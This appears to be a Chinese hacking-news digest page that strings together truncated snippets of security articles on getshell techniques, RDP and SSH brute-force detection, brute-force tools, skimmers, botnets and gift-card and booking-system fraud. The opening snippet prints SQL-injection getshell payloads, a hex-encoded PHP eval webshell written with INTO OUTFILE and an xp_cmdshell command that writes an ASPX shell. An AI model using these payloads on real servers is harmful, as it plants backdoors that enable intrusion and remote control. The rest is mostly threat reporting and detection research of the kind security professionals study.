记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华渗透测试-Getshell总结
无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。
0x01 注入getshell
一般前提条件:有权限、知道路径
mysqlselect 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile '/var/www/html/1.php'Sql server存储过程xp_cmdshell;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<
发布时间:2020-05-11 18:30 |
阅读:5070 | 评论:0 |
标签:内网渗透 APT攻击 Getshell getwebshell RCE getshell SSRF + RCE XXE
攻击检测的前沿科学:用于检测RDP入站暴力破解的概率时间序列模型
公开了Windows远程桌面协议(RDP)的计算机对于攻击者来说是天然的攻击目标,因为它们提供了一种简单有效的方法来访问网络。暴力破解RDP是一种通过端口3389提供远程访问的安全网络通信协议,它不需要高水平的专业知识或使用漏洞的技术;攻击者可以利用许多现成的工具在网络上扫描潜在的受害者,并利用类似的工具进行暴力攻击。攻击者将目标设定为使用弱密码且没有多因素身份验证,虚拟专用网络(VPN)和其他安全保护的RDP服务器。通过RDP暴力攻击,攻击者可以访问目标设备并进行许多后续活动,例如勒索软件和货币挖掘作业。在暴力破解中,攻击者试图通过有效使用一种或多种试错法来登录帐户。这些攻击通常与在非常短的时间频率(通常是几分钟甚至几秒钟)内发生的许多失败登录有
威胁检测之SSH暴力破解
0x00、前言暴力破解攻击是公有云最常见的攻击方式,根据某公有云统计数据发现,暴力破解占主机威胁数据的56%以上。平均到每个月大约有250万次之多,与此同时,再对比统计暴力破解成功的事件量,平均每月2500次,暴力破解成功率在0.1%。如果以主机为维度统计,暴力破解成功率就明显的提高了,大约在11%。通过上述数据分析,在公有云环境中,威胁检测产品需要对暴力破解攻击有足够的技术识别与防范。然后,我们再从攻击者的角度分析:分别从国家和城市两个维度分析,我们发现黑客暴力破解基础设施大部分分布在中国(44%)、美国(20%)和荷兰(7%)。城市分布:绍兴(10.1%)、纽约(8.8%)、阿姆斯特丹(5.6%)、北京(5.6%)
目录/文件/DNS/VHost暴力破解工具:Gobuster
GobusterGobuster是用于暴力破解的工具,基于Go编写,使用CLI交互式,具有良好的性能优化和连接处理,提供自定义HTTP标头的选项等。Gobuster安装提供两种方式直接下载编辑好的二进制文件 releases ,推荐自行编译自行编译go get github.com/OJ/gobustergo get && go buildgo install123go get github.com/OJ/gobustergo get && go buildgo install 如果已经具有所有依赖项,则可以使用构建脚本:make - 为当前的Go配置构建 (运行 go build)make windows - 为Windows构建32位和64位二进制文件,并将其写入buil
发布时间:2019-10-18 12:45 |
阅读:35594 | 评论:0 |
标签:暴力破解
Golang暴力破解器攻击电商网站
电商网站一直是网络犯罪分子关注的目标,通过攻击电商网站可以窃取个人信息、支付信息以及地址等信息。近期,研究人员发现有通过skimmer发起的攻击活动,其目的是监视用户输入,尤其是在线商城的输入,并将数据发送给攻击者。研究人员分析发现电商网站使用的CMS系统和相关的插件都存在漏洞。而且网站管理员使用的口令比较弱,因此暴力破解攻击非常容易就可以破解。调查是从新感染的Magento网站开始的。研究人员通过skimmer使用的域名发现与一个恶意软件有关,该恶意软件实际上是一款针对Magento, phpMyAdmin, cPanel的暴力破解器。虽然无法确定skimmer注入的方式,但研究人员相信这只是众多电商网站攻击活动中的
Outlaw组织僵尸网络分析:加密货币挖矿、扫描、暴力破解
研究人员之前曾分析过一个使用Internet Relay Chat (IRC) bot的名为Outlaw的僵尸网络。本文分析研究人员利用IoT蜜罐系统发现的该组织运营的一个僵尸网络。攻击bot使用haiduc工具来搜索网络寻找攻击目标。如果成功利用了一些漏洞,就在受害者主机上运行min.sh脚本。本文分析Outlaw攻击活动的两个变种。Bot主机第一个变种使用的脚本有两个功能:挖矿机和基于Haiduc的dropper。挖矿部分的代码有两个form表单。其中一个是明文bash/perl脚本,另一个是混淆的Perl脚本变种,可以绕过基于内容检测的IPS和防火墙的检测。Bot主机传播的第二个变种代码是用来暴力破解和利用微软R
SSH 暴力破解趋势:从云平台向物联网设备迁移 | 云鼎实验室出品
导语:近日,腾讯云发布2018上半年安全专题系列研究报告,该系列报告围绕云上用户最常遭遇的安全威胁展开,用数据统计揭露攻击现状,通过溯源还原攻击者手法,让企业用户与其他用户在应对攻击时有迹可循,并为其提供可靠的安全指南。上篇报告从 DDoS 攻击的角度揭示了云上攻击最新趋势,本篇由同一技术团队云鼎实验室分享:「SSH 暴力破解趋势:从云平台向物联网设备迁移 」, 以下简称《报告》。
一、基本概念
SSH 暴力破解是什么?
SSH 暴力破解是一种对远程登录设备(比如云服务器)的暴力攻击,该攻击会使用各种用户名、密码尝试登录设备,一旦成功登录,便可获得设备权限。本篇报告内容云鼎实验室从攻击现状、捕获样本、安全建议等方面展开。
近些年,新出现了众多入侵系统的手法,比如 Apache Struts2 漏洞利用、Had
SSH 暴力破解趋势:从云平台向物联网设备迁移
导语:近日,腾讯云发布2018上半年安全专题系列研究报告,该系列报告围绕云上用户最常遭遇的安全威胁展开,用数据统计揭露攻击现状,通过溯源还原攻击者手法,让企业用户与其他用户在应对攻击时有迹可循,并为其提供可靠的安全指南。上篇报告从 DDoS 攻击的角度揭示了云上攻击最新趋势,本篇由同一技术团队云鼎实验室分享:「SSH 暴力破解趋势:从云平台向物联网设备迁移 」, 以下简称《报告》。一、基本概念SSH 暴力破解是什么?SSH 暴力破解是一种对远程登录设备(比如云服务器)的暴力攻击,该攻击会使用各种用户名、密码尝试登录设备,一旦成功登录,便可获得设备权限。本篇报告内容云鼎实验室从攻击现状、捕获样本、安全建议等方面展开。近些
深入剖析LockCrypt——通过RDP暴力破解勒索软件
之前,我们曾报告(链接地址:https://www.alienvault.com/blogs/labs-research/samsam-ransomware-targeted-attacks-continue)过勒索软件SamSam向受害者索取高额赎金的事件,实际上,它并不是唯一一款敲诈令人乍舌的解密费用的勒索软件。今年6月份,一 ...
暗网系列之:网络犯罪分子滥用平台奖励积分
背景介绍
暗网上,网络犯罪分子想要窃取的数据不仅局限于个人身份信息和财务信息,最近,在几个论坛上观察到一些关于网上平台奖励积分项目的讨论,尤其是一些与旅行相关的平台是犯罪分子们最感兴趣的目标。
这些讨论与网络罪犯分子对酒店、机票和汽车租赁领域的欺诈服务的兴趣是一致的。通过持续的观察可以知道,在过去的几年时间里,这类欺诈服务已经逐渐在各种地下社区蔓延开来。
威胁行动者在首次提供这类非法的“订票服务”时,可以获得各种类型的旅游奖励积分。这也吸引了攻击者试图去入侵那些拥有各种奖励积分卡的用户的账户,攻击者利用这些积分可以在线完成诸如订购机票、车票,预定酒店和租车等服务。
俄语的暗网市场和地下论坛
在暗网和地下论坛中,这类积分滥用服务相当泛滥。例如,在一个准入门槛较低、级别也较低的俄语论坛上,成员们甚至建立了兴趣小组
如何黑掉礼品卡
2015年11月,威尔·卡布特在一家安全公司工作,签下了墨西哥一家大型连锁餐厅的渗透测试任务,要找出其网站上的可利用漏洞。到达其中一家餐厅后,卡布特注意到收银台旁放着一堆未激活的礼品卡。在他一张一张翻阅礼品卡时,他发现了一个模式:虽然卡片最后4位数字看起来好像是各不相同的随机数,但除了有1位数字是依次递增的外,其他数字均保持一致,就好像理好的扑克牌。吃完玉米煎饼,欺诈这一系统的计划也在他脑海中成型了。礼品欺诈经过几年的零售礼品卡行业研究,卡布特打算在本周末举行的Toorcon黑客大会上公布他的发现。这些发现是可以帮助黑客确定礼品卡号并从中牟利的超简单技巧,这甚至会发生在卡片合法持有者还没来得及使用之前。尽管其中有些方法已经半公开了几年,某些零售商也已经补上了安全漏洞,但还有一部分目标依然对礼品卡黑客方法敞开大门
[原]nessus集成hydra进行弱口令暴力破解
0X00 前言
Nessus 号称是"世界上最流行的漏洞扫描程序,全世界超过75,000个组织在使用它".尽管这个扫描程序可以免费下载得到,但是要从Tenable Network Security更新到所有最新的威胁信息,每年的直接订购费用是$1,200.Linux, FreeBSD, Solaris, Mac OS X和Windows下都可以使用 Nessus.。为了维持我博客的活跃度,勉强吐了一篇文章了,大伙将就看看看。
0x01 安装nessus
我们首先在centos7.2上安装了nessus. 安装过程也很简单。下载好nessus安装包传到服务器上执行如下:
[root@10.111.111.111 tmp~]# rpm -ivh Nessus-6.10.8-es7.x
发布时间:2017-08-01 23:05 |
阅读:294539 | 评论:0 |
标签:暴力破解
BruteXSS:XSS暴力破解神器
英文原版下载地址:github地址:https://github.com/ym2011/penetration/tree/master/BruteXSS
汉化版下载地址:http://files.cnblogs.com/files/Pitcoft/Brutexss(%E6%B1%89%E5%8C%96%E6%94%B9%E8%BF%9B).zip
//kali下使用汉化版的会乱码。
修改他人的航班预订竟然如此容易
旅行订票系统每天为千万人服务,但其安全性严重滞后,旅行订票系统的安全还停留在90年代,缺乏现代身份验证方法。一组研究人员分析了在线订票生态系统后发现:攻击者可以很容易地修改他人的预订,取消他们的航班,甚至使用退票款来为自己订票。
全球分销系统(GDS)是旅游机构、航空公司、酒店和租车公司广为使用的一套系统。柏林咨询机构安全研究实验室的研究人员,花费数月调查了该系统的安全性。上个月底举行的第33届混沌通信大会上,他们展示了自己的研究结果。
GDS是可追溯到巨型机时代的数据库,有关旅行预订的所有信息都存储其中,比如出行者的姓名、旅行日期、路线、票务详情、手机和邮件联系人、护照信息、信用卡号、座位号和行李信息。所有这些数据组成了所谓的旅客订座记录(PNR)。
世界三大GDS运营商是Sabre、Travelport和A
brut3k1t:服务端暴力破解工具
项目主页
https://github.com/ex0dus-0x/brut3k1t
简介
brut3k1t是一款支持多种协议的服务端的暴力破解工具,目前支持的协议有:
ssh
ftp
smtp
XMPP
instagram
facebook
将来会实现更多协议和服务(包括Twitter,Facebook和Instagram)
安装
安装简单。brut3k1t需要几个requires:
argparse – 用于解析命令行参数
paramiko – 用于SSH连接和认证
ftplib – 用于FTP连接和认证
smtplib – 用于与SMTP (email) 连接和认证
fbchat – 用于与Facebook连接
selenium &
持续按住回车键70秒即可获得root initramfs shell
这种简单的漏洞利用,需要物理接触操作系统,漏洞存在于Linux统一密钥安装(LUKS)中的问题。通过 initramfs shell,攻击者可以尝试暴力破解加密的文件系统,并且理论上对云端的Linux虚拟机也可用。Debian和Fedora系统均已确认受此问题的影响。
这个问题由西苏格兰大学的讲师Hector Marco和瓦伦西亚理工大学的助理教授Ismael Ripol联合发现。他们表示这个漏洞的利用并不需要特别的系统配置来实现,攻击者可拷贝、更改或是破坏硬盘文件,还可配置网络盗取数据。在包括图书馆、ATM、机场、实验室等环境下,该漏洞可能产生严重后果,这些环境一般都属于启动过程受到保护(BIOS和GRUB口令),并只有键盘或鼠标的操作环境。
红帽社区将其评为编程错误类型的漏洞 (CVE-2016-4484
公告
九层之台,起于累土;黑客之术,始于阅读